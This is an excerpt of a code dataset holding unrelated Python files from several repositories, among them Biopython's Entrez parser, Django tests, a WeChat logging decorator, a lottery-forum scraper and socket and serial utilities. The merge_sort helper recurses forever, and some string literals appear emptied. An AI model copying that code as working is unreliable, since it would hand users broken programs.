ValidationError(tag)\n else:\n # this will not be stored in the record\n self.parser.StartElementHandler = self.startSkipElementHandler\n self.parser.EndElementHandler = self.endSkipElementHandler\n self.parser.CharacterDataHandler = self.skipCharacterDataHandler\n self.level = 1\n\n def startRawElementHandler(self, name, attrs):\n \"\"\"Handle start of an XML raw element.\"\"\"\n # check if the name is in a namespace\n prefix = None\n if self.namespace_prefix:\n try:\n uri, name = name.split()\n except ValueError:\n pass\n else:\n prefix = self.namespace_prefix[uri]\n if self.namespace_level[prefix] == 1:\n attrs = {\"xmlns\": uri}\n if prefix:\n key = \"%s:%s\" % (prefix, name)\n else:\n key = name\n # self.allowed_tags is ignored for now. Anyway we know what to do\n # with this tag.\n tag = \"<%s\" % name\n for key, value in attrs.items():\n tag += ' %s=\"%s\"' % (key, value)\n tag += \">\"\n self.data.append(tag)\n self.parser.EndElementHandler = self.endRawElementHandler\n self.level += 1\n\n def startSkipElementHandler(self, name, attrs):\n \"\"\"Handle start of an XML skip element.\"\"\"\n self.level += 1\n\n def endStringElementHandler(self, tag):\n \"\"\"Handle end of an XML string element.\"\"\"\n element = self.element\n if element is not None:\n self.parser.StartElementHandler = self.startElementHandler\n self.parser.EndElementHandler = self.endElementHandler\n self.parser.CharacterDataHandler = self.skipCharacterDataHandler\n value = \"\".join(self.data)\n self.data = []\n attributes = self.attributes\n self.attributes = None\n if tag in self.items:\n assert tag == \"Item\"\n key = str(attributes[\"Name\"]) # convert from Unicode\n del attributes[\"Name\"]\n else:\n key = tag\n # Convert Unicode strings to plain strings if possible\n try:\n value = StringElement(value, tag, attributes, key)\n except UnicodeEncodeError:\n value = UnicodeElement(value, tag, attributes, key)\n if element is None:\n self.record = element\n else:\n element.store(value)\n self.allowed_tags = None\n\n def endRawElementHandler(self, name):\n \"\"\"Handle start of an XML raw element.\"\"\"\n self.level -= 1\n if self.level == 0:\n self.parser.EndElementHandler = self.endStringElementHandler\n if self.namespace_prefix:\n uri, name = name.split()\n tag = \"\" % name\n self.data.append(tag)\n\n def endSkipElementHandler(self, name):\n \"\"\"Handle start of an XML skip element.\"\"\"\n self.level -= 1\n if self.level == 0:\n self.parser.StartElementHandler = self.startElementHandler\n self.parser.EndElementHandler = self.endElementHandler\n\n def endErrorElementHandler(self, name):\n \"\"\"Handle start of an XML error element.\"\"\"\n if self.data:\n # error found:\n value = \"\".join(self.data)\n raise RuntimeError(value)\n # no error found:\n if self.element is not None:\n self.parser.EndElementHandler = self.endElementHandler\n self.parser.CharacterDataHandler = self.skipCharacterDataHandler\n\n def endElementHandler(self, name):\n \"\"\"Handle end of an XML element.\"\"\"\n element = self.element\n self.element = element.parent\n del element.parent\n\n def endIntegerElementHandler(self, tag):\n \"\"\"Handle end of an XML integer element.\"\"\"\n attributes = self.attributes\n self.attributes = None\n assert tag == \"Item\"\n key = str(attributes[\"Name\"]) # convert from Unicode\n del attributes[\"Name\"]\n if self.data:\n value = int(\"\".join(self.data))\n self.data = []\n value = IntegerElement(value, tag, attributes, key)\n else:\n value = NoneElement(tag, attributes, key)\n element = self.element\n if element is None:\n self.record = value\n else:\n self.parser.EndElementHandler = self.endElementHandler\n self.parser.CharacterDataHandler = self.skipCharacterDataHandler\n if value is None:\n return\n element.store(value)\n\n def characterDataHandlerRaw(self, content):\n \"\"\"Handle character data as-is (raw).\"\"\"\n self.data.append(content)\n\n def characterDataHandlerEscape(self, content):\n \"\"\"Handle character data by encoding it.\"\"\"\n content = escape(content)\n self.data.append(content)\n\n def skipCharacterDataHandler(self, content):\n \"\"\"Handle character data by skipping it.\"\"\"\n return\n\n def parse_xsd(self, root):\n \"\"\"Parse an XSD file.\"\"\"\n prefix = \"{http://www.w3.org/2001/XMLSchema}\"\n for element in root:\n isSimpleContent = False\n attribute_keys = []\n keys = []\n multiple = []\n assert element.tag == prefix + \"element\"\n name = element.attrib[\"name\"]\n assert len(element) == 1\n complexType = element[0]\n assert complexType.tag == prefix + \"complexType\"\n for component in complexType:\n tag = component.tag\n if tag == prefix + \"attribute\":\n # we could distinguish by type; keeping string for now\n attribute_keys.append(component.attrib[\"name\"])\n elif tag == prefix + \"sequence\":\n maxOccurs = component.attrib.get(\"maxOccurs\", \"1\")\n for key in component:\n assert key.tag == prefix + \"element\"\n ref = key.attrib[\"ref\"]\n keys.append(ref)\n if maxOccurs != \"1\" or key.attrib.get(\"maxOccurs\", \"1\") != \"1\":\n multiple.append(ref)\n elif tag == prefix + \"simpleContent\":\n assert len(component) == 1\n extension = component[0]\n assert extension.tag == prefix + \"extension\"\n assert extension.attrib[\"base\"] == \"xs:string\"\n for attribute in extension:\n assert attribute.tag == prefix + \"attribute\"\n # we could distinguish by type; keeping string for now\n attribute_keys.append(attribute.attrib[\"name\"])\n isSimpleContent = True\n allowed_tags = frozenset(keys)\n if len(keys) == 1 and keys == multiple:\n assert not isSimpleContent\n self.lists[name] = allowed_tags\n elif len(keys) >= 1:\n assert not isSimpleContent\n repeated_tags = frozenset(multiple)\n self.dictionaries[name] = (allowed_tags, repeated_tags)\n else:\n self.strings[name] = allowed_tags\n\n def elementDecl(self, name, model):\n \"\"\"Call a call-back function for each element declaration in a DTD.\n\n This is used for each element declaration in a DTD like::\n\n \n\n The purpose of this function is to determine whether this element\n should be regarded as a string, integer, list, dictionary, structure,\n or error.\n \"\"\"\n if name.upper() == \"ERROR\":\n self.errors.add(name)\n return\n if name == \"Item\" and model == (\n expat.model.XML_CTYPE_MIXED,\n expat.model.XML_CQUANT_REP,\n None,\n ((expat.model.XML_CTYPE_NAME, expat.model.XML_CQUANT_NONE, \"Item\", ()),),\n ):\n # Special case. As far as I can tell, this only occurs in the\n # eSummary DTD.\n self.items.add(name)\n return\n # First, remove ignorable parentheses around declarations\n while (\n model[0] in (expat.model.XML_CTYPE_SEQ, expat.model.XML_CTYPE_CHOICE)\n and model[1] in (expat.model.XML_CQUANT_NONE, expat.model.XML_CQUANT_OPT)\n and len(model[3]) == 1\n ):\n model = model[3][0]\n # PCDATA declarations correspond to strings\n if model[0] in (expat.model.XML_CTYPE_MIXED, expat.model.XML_CTYPE_EMPTY):\n if model[1] == expat.model.XML_CQUANT_REP:\n children = model[3]\n allowed_tags = frozenset(child[2] for child in children)\n else:\n allowed_tags = frozenset()\n self.strings[name] = allowed_tags\n return\n # List-type elements\n if model[0] in (\n expat.model.XML_CTYPE_CHOICE,\n expat.model.XML_CTYPE_SEQ,\n ) and model[1] in (expat.model.XML_CQUANT_PLUS, expat.model.XML_CQUANT_REP):\n children = model[3]\n if model[0] == expat.model.XML_CTYPE_SEQ:\n assert len(children) == 1\n allowed_tags = frozenset(child[2] for child in children)\n self.lists[name] = allowed_tags\n return\n # This is the tricky case. Check which keys can occur multiple\n # times. If only one key is possible, and it can occur multiple\n # times, then this is a list. If more than one key is possible,\n # but none of them can occur multiple times, then this is a\n # dictionary. Otherwise, this is a structure.\n # In 'single' and 'multiple', we keep track which keys can occur\n # only once, and which can occur multiple times.\n single = []\n multiple = []\n # The 'count' function is called recursively to make sure all the\n # children in this model are counted. Error keys are ignored;\n # they raise an exception in Python.\n\n def count(model):\n quantifier, key, children = model[1:]\n if key is None:\n if quantifier in (\n expat.model.XML_CQUANT_PLUS,\n expat.model.XML_CQUANT_REP,\n ):\n for child in children:\n multiple.append(child[2])\n else:\n for child in children:\n count(child)\n elif key.upper() != \"ERROR\":\n if quantifier in (\n expat.model.XML_CQUANT_NONE,\n expat.model.XML_CQUANT_OPT,\n ):\n single.append(key)\n elif quantifier in (\n expat.model.XML_CQUANT_PLUS,\n expat.model.XML_CQUANT_REP,\n ):\n multiple.append(key)\n\n count(model)\n if len(single) == 0 and len(multiple) == 1:\n allowed_tags = frozenset(multiple)\n self.lists[name] = allowed_tags\n else:\n allowed_tags = frozenset(single + multiple)\n repeated_tags = frozenset(multiple)\n self.dictionaries[name] = (allowed_tags, repeated_tags)\n\n def open_dtd_file(self, filename):\n \"\"\"Open specified DTD file.\"\"\"\n self._initialize_directory()\n path = os.path.join(self.local_dtd_dir, filename)\n try:\n handle = open(path, \"rb\")\n except IOError:\n pass\n else:\n return handle\n path = os.path.join(self.global_dtd_dir, filename)\n try:\n handle = open(path, \"rb\")\n except IOError:\n pass\n else:\n return handle\n return None\n\n def open_xsd_file(self, filename):\n \"\"\"Open specified XSD file.\"\"\"\n self._initialize_directory()\n path = os.path.join(self.local_xsd_dir, filename)\n try:\n handle = open(path, \"rb\")\n except IOError:\n pass\n else:\n return handle\n path = os.path.join(self.global_xsd_dir, filename)\n try:\n handle = open(path, \"rb\")\n except IOError:\n pass\n else:\n return handle\n return None\n\n def save_dtd_file(self, filename, text):\n \"\"\"Save DTD file to cache.\"\"\"\n self._initialize_directory()\n path = os.path.join(self.local_dtd_dir, filename)\n try:\n handle = open(path, \"wb\")\n except IOError:\n warnings.warn(\"Failed to save %s at %s\" % (filename, path))\n else:\n handle.write(text)\n handle.close()\n\n def save_xsd_file(self, filename, text):\n \"\"\"Save XSD file to cache.\"\"\"\n self._initialize_directory()\n path = os.path.join(self.local_xsd_dir, filename)\n try:\n handle = open(path, \"wb\")\n except IOError:\n warnings.warn(\"Failed to save %s at %s\" % (filename, path))\n else:\n handle.write(text)\n handle.close()\n\n def externalEntityRefHandler(self, context, base, systemId, publicId):\n \"\"\"Handle external entity reference in order to cache DTD locally.\n\n The purpose of this function is to load the DTD locally, instead\n of downloading it from the URL specified in the XML. Using the local\n DTD results in much faster parsing. If the DTD is not found locally,\n we try to download it. If new DTDs become available from NCBI,\n putting them in Bio/Entrez/DTDs will allow the parser to see them.\n \"\"\"\n urlinfo = _urlparse(systemId)\n # Following attribute requires Python 2.5+\n # if urlinfo.scheme=='http':\n if urlinfo[0] in [\"http\", \"https\", \"ftp\"]:\n # Then this is an absolute path to the DTD.\n url = systemId\n elif urlinfo[0] == \"\":\n # Then this is a relative path to the DTD.\n # Look at the parent URL to find the full path.\n try:\n source = self.dtd_urls[-1]\n except IndexError:\n # Assume the default URL for DTDs if the top parent\n # does not contain an absolute path\n source = \"http://www.ncbi.nlm.nih.gov/dtd/\"\n else:\n source = os.path.dirname(source)\n # urls always have a forward slash, don't use os.path.join\n url = source.rstrip(\"/\") + \"/\" + systemId\n else:\n raise ValueError(\"Unexpected URL scheme %r\" % (urlinfo[0]))\n self.dtd_urls.append(url)\n # First, try to load the local version of the DTD file\n location, filename = os.path.split(systemId)\n handle = self.open_dtd_file(filename)\n if not handle:\n # DTD is not available as a local file. Try accessing it through\n # the internet instead.\n try:\n handle = _urlopen(url)\n except IOError:\n _raise_from(\n RuntimeError(\"Failed to access %s at %s\" % (filename, url)), None\n )\n text = handle.read()\n handle.close()\n self.save_dtd_file(filename, text)\n handle = BytesIO(text)\n\n parser = self.parser.ExternalEntityParserCreate(context)\n parser.ElementDeclHandler = self.elementDecl\n parser.ParseFile(handle)\n handle.close()\n self.dtd_urls.pop()\n return 1\n\n def _initialize_directory(self):\n \"\"\"Initialize the local DTD/XSD directories (PRIVATE).\n\n Added to allow for custom directory (cache) locations,\n for example when code is deployed on AWS Lambda.\n \"\"\"\n # If user hasn't set a custom cache location, initialize it.\n if self.directory is None:\n import platform\n\n if platform.system() == \"Windows\":\n self.directory = os.path.join(os.getenv(\"APPDATA\"), \"biopython\")\n else: # Unix/Linux/Mac\n home = os.path.expanduser(\"~\")\n self.directory = os.path.join(home, \".config\", \"biopython\")\n del home\n del platform\n # Create DTD local directory\n self.local_dtd_dir = os.path.join(self.directory, \"Bio\", \"Entrez\", \"DTDs\")\n try:\n os.makedirs(self.local_dtd_dir) # use exist_ok=True on Python >= 3.2\n except OSError as exception:\n # Check if local_dtd_dir already exists, and that it is a directory.\n # Trying os.makedirs first and then checking for os.path.isdir avoids\n # a race condition.\n if not os.path.isdir(self.local_dtd_dir):\n _raise_from(exception, None)\n # Create XSD local directory\n self.local_xsd_dir = os.path.join(self.directory, \"Bio\", \"Entrez\", \"XSDs\")\n try:\n os.makedirs(self.local_xsd_dir) # use exist_ok=True on Python >= 3.2\n except OSError as exception:\n if not os.path.isdir(self.local_xsd_dir):\n _raise_from(exception, None)\n\n @property\n def directory(self):\n \"\"\"Directory for caching XSD and DTD files.\"\"\"\n return self._directory\n\n @directory.setter\n def directory(self, directory):\n \"\"\"Allow user to set a custom directory, also triggering subdirectory initialization.\"\"\"\n self._directory = directory\n self._initialize_directory()\n","repo_name":"aamirjankhan/BioinformaticsTool","sub_path":"BioinformaticsTool/venv/Lib/site-packages/Bio/Entrez/Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":39574,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"663513636","text":"\"\"\"\nTests suite for the views of the licenses app.\n\"\"\"\n\nfrom django.test import TestCase, Client\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\nfrom django.test.utils import override_settings\n\nfrom ..models import License\n\n\n@override_settings(MEDIA_ROOT=settings.DEBUG_MEDIA_ROOT)\nclass LicenseViewsTestCase(TestCase):\n \"\"\"\n Tests suite for the views.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Create some fixtures for the tests.\n \"\"\"\n self.license1 = License.objects.create(name='Test 1',\n slug='test-1',\n description='Hello World!')\n self.license2 = License.objects.create(name='Test 2',\n slug='test-2',\n description='Hello World!')\n self.license3 = License.objects.create(name='Test 3',\n slug='test-3',\n description='Hello World!',\n logo='fixtures/beautifulfrog.jpg')\n\n def test_license_list_view_available(self):\n \"\"\"\n Test the availability of the \"license list\" view.\n \"\"\"\n client = Client()\n response = client.get(reverse('licenses:index'))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'licenses/license_list.html')\n self.assertIn('licenses', response.context)\n self.assertQuerysetEqual(response.context['licenses'], ['',\n '',\n ''])\n\n def test_license_detail_view_available(self):\n \"\"\"\n Test the availability of the \"license detail\" view.\n \"\"\"\n client = Client()\n response = client.get(self.license3.get_absolute_url())\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'licenses/license_detail.html')\n self.assertIn('license', response.context)\n self.assertEqual(response.context['license'], self.license3)\n\n def test_license_detail_view_unavailable_with_unknown_slug(self):\n \"\"\"\n Test the unavailability of the \"license detail\" view with an unknown license's slug.\n \"\"\"\n client = Client()\n response = client.get(reverse('licenses:license_detail', kwargs={'slug': 'unknown-license'}))\n self.assertEqual(response.status_code, 404)\n self.assertTemplateUsed(response, '404.html')\n","repo_name":"TamiaLab/carnetdumaker","sub_path":"apps/licenses/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"8998432899","text":"\"\"\"\n21. Merge Two Sorted Lists\nMerge two sorted linked lists and return it as a new list. The new list should be made by splicing together the nodes of the first two lists.\n\nExample:\n\nInput: 1->2->4, 1->3->4\nOutput: 1->1->2->3->4->4\n\"\"\"\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def mergeTwoLists(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n\n head = current = ListNode(0)\n\n while l1 or l2:\n\n if l1 and l2:\n\n if l1.val <= l2.val:\n current.next = l1\n l1 = l1.next\n else:\n current.next = l2\n l2 = l2.next\n current = current.next\n\n else:\n if l1:\n current.next = l1\n l1 = None\n else:\n current.next = l2\n l2 = None\n\n return head.next\n\nif __name__ == '__main__':\n node1_0 = ListNode(0)\n node1_1 = ListNode(1)\n node1_2 = ListNode(2)\n\n node2_0 = ListNode(0)\n node2_1 = ListNode(1)\n\n node1_0.next = node1_1\n node1_1.next = node1_2\n node2_0.next = node2_1\n\n solution = Solution()\n head = solution.mergeTwoLists(node1_0, node2_0)","repo_name":"mungerism/LeetcodePython","sub_path":"21. Merge Two Sorted Lists.py","file_name":"21. Merge Two Sorted Lists.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"30947014548","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/3/30 20:23\n# @Author : lihanhan\n# @Email : demo1li@163.com\n# @File : 合并2个有序列表.py\ndef merge(items1, items2, comp=lambda x, y: x < y):\n \"\"\"合并(将两个有序的列表合并成一个有序的列表)\"\"\"\n items = []\n index1, index2 = 0, 0\n while index1 < len(items1) and index2 < len(items2):\n if comp(items1[index1], items2[index2]):\n items.append(items1[index1])\n index1 += 1\n else:\n items.append(items2[index2])\n index2 += 1\n items += items1[index1:]\n items += items2[index2:]\n return items\n\n\ndef merge_sort(items, comp=lambda x, y: x < y):\n return merge_sort(list(items), comp)","repo_name":"createnewdemo/pycharm_pracise1","sub_path":"基础加强/数据结构算法/合并2个有序列表.py","file_name":"合并2个有序列表.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"71057922039","text":"import conexion_mysql\nfrom conexion_mysql import Customer\nfrom sqlalchemy.orm import sessionmaker\n\n\nSession = sessionmaker(bind=conexion_mysql.engine)\nsession = Session()\n\n\ndef save_mariadb(info):\n exist = check_info_mariadb(info)\n if exist:\n print(\"Ya existe el elemento en MariaDB\")\n else:\n new_model = Customer(Model = info[2], Vendor = info[0], Softver = info[1])\n session.add(new_model)\n session.commit() \n print(\"Guardando en MariaDB\")\n\n\ndef check_info_mariadb(info):\n Session = sessionmaker(bind=conexion_mysql.engine)\n session = Session()\n models = session.query(Customer).all()\n counter = 0\n for model in models:\n if model.Model == info[2]:\n counter += 1\n if model.Vendor == info[0]:\n counter += 1\n if model.Softver == info[1]:\n counter += 1\n if counter == 3:\n return True\n else:\n return False\n","repo_name":"castrodiegojose/backend_snmp_python","sub_path":"src/save_Mariadb.py","file_name":"save_Mariadb.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9920029530","text":"\"\"\"Palindromic prime finder\r\nCharlie Shang\r\n9 May 2014\"\"\"\r\n\r\n#Increase the recursion limit in python\r\nimport sys\r\nsys.setrecursionlimit (30000)\r\n\r\n#Ask for start and end points\r\nN = eval(input(\"Enter the starting point N:\\n\"))\r\nM = eval(input(\"Enter the ending point M:\\n\"))\r\n\r\nif N > 1: \r\n num = N\r\nelse:\r\n num = 2 #if starting point is less than 2, set as 2 because 1 is not prime\r\n\r\nprint(\"The palindromic primes are:\")\r\n \r\ndef is_palindrome(num):\r\n \"\"\"Determines palindromity of a number (T/F)\"\"\"\r\n \r\n num = str(num) #Converts a number to a string.\r\n \r\n #if the length is < 3 and first character = last character, return true \r\n if num[0] == num[-1] and len(num) <= 3:\r\n return True\r\n \r\n #If length > 3, and begin and end matches, delete the first and last character and re-evaluate if it is a palindrome\r\n elif num[0] == num[-1]: \r\n return is_palindrome(num[1:-1])\r\n \r\n #Return False if not palindrome.\r\n \r\n else:\r\n return False\r\n\r\ndef send(num):\r\n \"\"\"Sends palindromic numbers to 'is_prime.' \"\"\" \r\n \r\n if num > M: #Recursion ends when end point is reached \r\n return -1\r\n \r\n #Check if the current number is a palindrome. If it is, send to is_prime.\r\n Check = is_palindrome(num)\r\n if Check == True:\r\n div = 2\r\n \r\n return is_prime(num, div)\r\n \r\n else: #else check if the next num is a palindrome if 'num' is not...\r\n return send(num+1)\r\n \r\ndef is_prime(num, div):\r\n \"\"\"Finds if a number is prime\"\"\"\r\n \r\n #only repeat if divisor is smaller than num**(1/2)\r\n if div <= num**(1/2):\r\n \r\n if num%div == 0:\r\n return send(num+1) #if a palindrome is not a prime, return the next palindrome\r\n \r\n else:\r\n return is_prime(num, div + 1) #If number cannot be divided through, increase divisor and repeat.\r\n \r\n \r\n else:#If palindrome and prime, print and find the next palindromic prime by recursion..\r\n \r\n print(num)\r\n return send(num+1)\r\n \r\nif __name__==\"__main__\":\r\n send(num)","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/shnhua002/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11520477372","text":"import re\n\nimport requests\nimport time\nfrom lxml import etree\nimport pymysql\n\nfrom celery_pro.utils.config import config\n\n\nclass ArticleSpider(object):\n def __init__(self):\n self.db = pymysql.connect(host=config.SPIDER_HOST, user=config.SPIDER_USER,\n password=config.SPIDER_PASSWORD, db=config.SPIDER_DB, port=config.SPIDER_PORT)\n\n def get_picture(self):\n for i in range(1, 20):\n main_url = \"https://www.89829m.com/bbs/bbs\"\n main_url += \"0\" + str(i) if i < 10 else str(i)\n main_url += \".html\"\n response = requests.get(url=main_url, timeout=20)\n text = response.text\n # print(text.encode(response.encoding).decode(\"utf-8\"))\n html = etree.HTML(text.encode(response.encoding).decode(\"utf-8\"))\n li_list = html.xpath(\"/html/body/div[4]/div/ul/li\")\n\n # 标题\n title = html.xpath(\"/html/body/div[4]/div/h3/text()\")\n period = title[0][1:4]\n print(title, period)\n\n for li in li_list:\n text_list = li.xpath(\"./text()\") #\n text_2 = li.xpath(\"./span/text()\") # 猜测\n text_3 = li.xpath(\"./span/u/text()\")[0] if li.xpath(\"./span/u/text()\") else \"\" # 中\n text_4 = li.xpath(\"./font/text()\")[0] if li.xpath(\"./font/text()\") else \"\" # 结果\n print(text_list, text_2, text_3, text_4)\n kai_1 = text_2[1] if len(text_2) == 2 else \"\"\n kai_2 = text_2[0] if text_2 else \"\"\n guess = kai_2 + text_3 + kai_1\n result = text_4\n content_1 = text_list[0] if text_list else \"\"\n content_2 = text_list[1] if len(text_list) == 2 else \"\"\n content_3 = text_list[2] if len(text_list) == 3 else \"\"\n content = content_1 + guess + content_2 + result + content_3\n print(content)\n self.save_in_db(title=title, period=period, content=content, result=result, guess=guess)\n self.db.close()\n\n return self\n\n def save_in_db(self, title, period, content, result, guess):\n cur = self.db.cursor()\n sql_insert = \"insert into article(create_time,title,period,content,result,guess) values(%s,%s,%s,%s,%s,%s)\"\n cur.execute(sql_insert, (int(time.time()), title, period, content, result, guess))\n # 提交\n self.db.commit()\n return self\n\n\na = ArticleSpider().get_picture()\n","repo_name":"thelastant/liuhc_spider","sub_path":"liuhc_spider/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35552555478","text":"import pickle\nfrom components.extract_column.column import Column\nfrom components.extended_summaries.bert_summary import BertSummary\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport codecs, json \nimport numpy as np\n\nwith open('columns.p', 'rb') as f:\n columns = pickle.load(f)\nprint(\"Extracted Columns...\")\n# columns = columns\nBertsList = [BertSummary(col) for col in columns]\nprint(\"Built BertSummaries...\")\n\nembedList = np.array([bert.vector for bert in BertsList])\nprint(\"Extracted vectors...\")\nprint(embedList.shape)\nembedList = np.array(embedList)\ncosine_matrix = cosine_similarity(embedList)\nprint(\"Computed Cosines!...\")\nprint(cosine_matrix)\n\nfile_path = './similarities.json'\njson.dump(cosine_matrix.tolist(), codecs.open(file_path, 'w', encoding='utf-8'), separators=(',', ':'), sort_keys=True, indent=4) ### this saves the array in .json format\n","repo_name":"kabrol98/sella-cherian","sub_path":"testing/pipeline_testing/bert_test.py","file_name":"bert_test.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6427231461","text":"\nimport argparse\n\nfrom hw2_utils import TraceEntry\n\n# Example for getting command line arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"input\", type=str, help=\"path to input file\")\nparser.add_argument(\"output\", type=str, help=\"path to output file.\")\n\nargs = parser.parse_args()\n\nwith open(args.input) as in_fd, open(args.output, 'w') as out_fd:\n for line in in_fd:\n for entry in TraceEntry(line).split_blocks():\n out_fd.write(\"{}\\n\".format(str(entry)))","repo_name":"AmnonHanuhov/AdvancedTopics_236601","sub_path":"HW2/adapted_simulator/split_requests.py","file_name":"split_requests.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4596250679","text":"import socket\nimport serial\ns = socket.socket()\nhost = '192.168.1.101' \nprint(host)\nport = 8002\ns.bind((host, port))\nser = serial.Serial('/dev/ttyACM0', 4800)\ns.listen(5)\nwhile True:\n c, addr = s.accept()\n print ('Got connection from',addr)\n rec = c.recv(1024)\n ser.flushInput()\n ser.write(rec)\n print(rec.decode())\n c.close()\n","repo_name":"rnymke/Facecrasher","sub_path":"rpi/Tutorial/send_receive/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"20221553998","text":"\nimport numpy as np\n\nfrom .load_or_create_graph import Landscape\n\ndef create_obstacle_map(terrain: Landscape, obstacle_args: dict) -> np.ndarray:\n \"\"\"Create obstacle map with size of the terrain.\n \n When obstacle map has value 1 at some location this indicates a location is an obstacle.\n 0 Means it is not an object (penetrable). Currently two kinds of obstacles are supported:\n - open: No obstacle whatsoever.\n - square: Rectangular obstacle defined as a fraction of the total size.\"\"\"\n\n assert obstacle_args['NAME'] in ['open', 'square'], 'Only no obstacle (open) and square obstacles are implemented.'\n\n obstacle_map = np.zeros_like(terrain.x_coords)\n\n if obstacle_args['NAME'] == 'open':\n return obstacle_map\n \n elif obstacle_args['NAME'] == 'square':\n\n size = terrain.x_coords.shape[0]\n params = obstacle_args['PARAMS']\n\n obstacle_map[int(params['FRACS_X'][0]*size):int(params['FRACS_X'][1]*size),\n int(params['FRACS_Y'][0]*size):int(params['FRACS_Y'][1]*size)] = 1\n \n return obstacle_map\n","repo_name":"PimVeefkind/iUGV","sub_path":"utils/create_obstacle_map.py","file_name":"create_obstacle_map.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33760418296","text":"# coding=utf-8\n\"\"\"Status monitor on wechat, to report progress / status of project on wechat\"\"\"\n\nfrom datetime import datetime\nfrom logging import INFO\nfrom wxpy import get_wechat_logger\n\n\nwechat_logger = get_wechat_logger(name='status_monitor', level=INFO)\ntime_format = '%Y-%m-%d %H:%M:%S'\n\n\ndef status_monitor_on_wechat(func_):\n \"\"\"Decorator to send wechat messages to file helper when the decorated function is called and finished\"\"\"\n def inner_func(*args, **kwargs):\n \"\"\"Decorated function with general input\"\"\"\n _name = str(func_).split(' ')[1]\n _begin = datetime.now()\n wechat_logger.info('Start running function <{}> at {}'.format(_name, datetime.strftime(_begin, time_format)))\n\n try:\n _res = func_(*args, **kwargs)\n _end = datetime.now()\n _last = _end - _begin\n wechat_logger.info('Finish running function <{}> at {}, lasting {} seconds\\nResult: {}'.format(\n _name, datetime.strftime(_end, time_format), _last.total_seconds(), str(_res)))\n return _res\n\n except Exception as e:\n _msg = str(e)\n _end = datetime.now()\n _last = _end - _begin\n wechat_logger.error('Failed to run <{}> at {}, lasting {} seconds\\nError msg: {}'.format(\n _name, datetime.strftime(_end, time_format), _last.total_seconds(), _msg))\n raise Exception(_msg)\n\n return inner_func\n","repo_name":"TongyanXu/wechat_tools","sub_path":"ex_tools/status_monitor.py","file_name":"status_monitor.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"5721819220","text":"\r\nimport requests\r\nimport json\r\nimport jsonpath\r\n\r\nurl = \"https://reqres.in/api/users?page=2\"\r\n# posielame get request\r\nresponse = requests.get(url)\r\n\r\nassert response.status_code == 200\r\n\r\n#parsovanie response do json formatu\r\n\r\njson_response = json.loads(response.text)\r\n#print(json_response)\r\n\r\n# verifikacia total pages\r\ntotal = jsonpath.jsonpath(json_response,'total')\r\nassert total[0] == 12\r\nprint(total)\r\n\r\n#\r\n\r\nfor i in range(0,6):\r\n last_name = jsonpath.jsonpath(json_response,'data['+str(i)+'].last_name')\r\n print((last_name[0]))\r\n\r\nresult = total == i\r\nprint(result)\r\n","repo_name":"rychvalsky/qats","sub_path":"qats_get_api.py","file_name":"qats_get_api.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31356924819","text":"__docformat__ = 'restructuredtext'\n\nimport sys\n\nfrom zope.interface import implements\n\nfrom zope.tales.expressions import PathExpr, StringExpr, NotExpr, DeferExpr\nfrom zope.tales.expressions import SimpleModuleImporter\nfrom zope.tales.pythonexpr import PythonExpr\nfrom zope.tales.tales import ExpressionEngine, Context\n\nfrom zope.component.exceptions import ComponentLookupError\nfrom zope.app.traversing.interfaces import TraversalError\nfrom zope.security.untrustedpython import rcompile\nfrom zope.security.proxy import ProxyFactory\nfrom zope.security.untrustedpython.builtins import SafeBuiltins\nfrom zope.i18n import translate\n\nfrom zope.app import zapi\nfrom zope.app.i18n import ZopeMessageFactory as _\nfrom zope.app.traversing.adapters import Traverser, traversePathElement\nfrom zope.app.traversing.interfaces import IPathAdapter, ITraversable\n\nclass InlineCodeError(Exception):\n pass\n\n\ndef zopeTraverser(object, path_items, econtext):\n \"\"\"Traverses a sequence of names, first trying attributes then items.\n \"\"\"\n request = getattr(econtext, 'request', None)\n path_items = list(path_items)\n path_items.reverse()\n\n while path_items:\n name = path_items.pop()\n object = traversePathElement(object, name, path_items,\n 